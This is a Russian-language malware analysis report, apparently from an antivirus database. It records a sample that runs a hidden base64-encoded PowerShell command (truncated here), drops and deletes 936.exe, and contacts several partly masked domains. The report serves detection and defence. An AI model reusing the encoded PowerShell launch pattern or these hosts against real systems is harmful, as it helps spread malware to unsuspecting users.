Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\936.exe
Удаляет следующие файлы
- %HOMEPATH%\936.exe
Сетевая активность
Подключается к
- 'mv###nte.com.br':80
TCP
Другие
- 'to#####.#ommunitymonitoring.org':443
UDP
- DNS ASK me####anandco.net
- DNS ASK to#####.#ommunitymonitoring.org
- DNS ASK rc#####seofworship.org
- DNS ASK mv###nte.com.br
- DNS ASK do####ria-lb.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco JABQAHcAZQBjAHYAdgBxAGIAYQA9ACcASwB4AG0AaABpAGMAZwBnACcAOwAkAFcAawBrAGMAcgBsAGEAYwB4AGUAdABsAGwAIAA9ACAAJwA5ADMANgAnADsAJABIAGQAeAB3AGwAbgBxAGoAZwB2AHEAbAA9ACcARAB0AGUAYwBmAGoAawBuAHEAYgA...' (со скрытым окном)
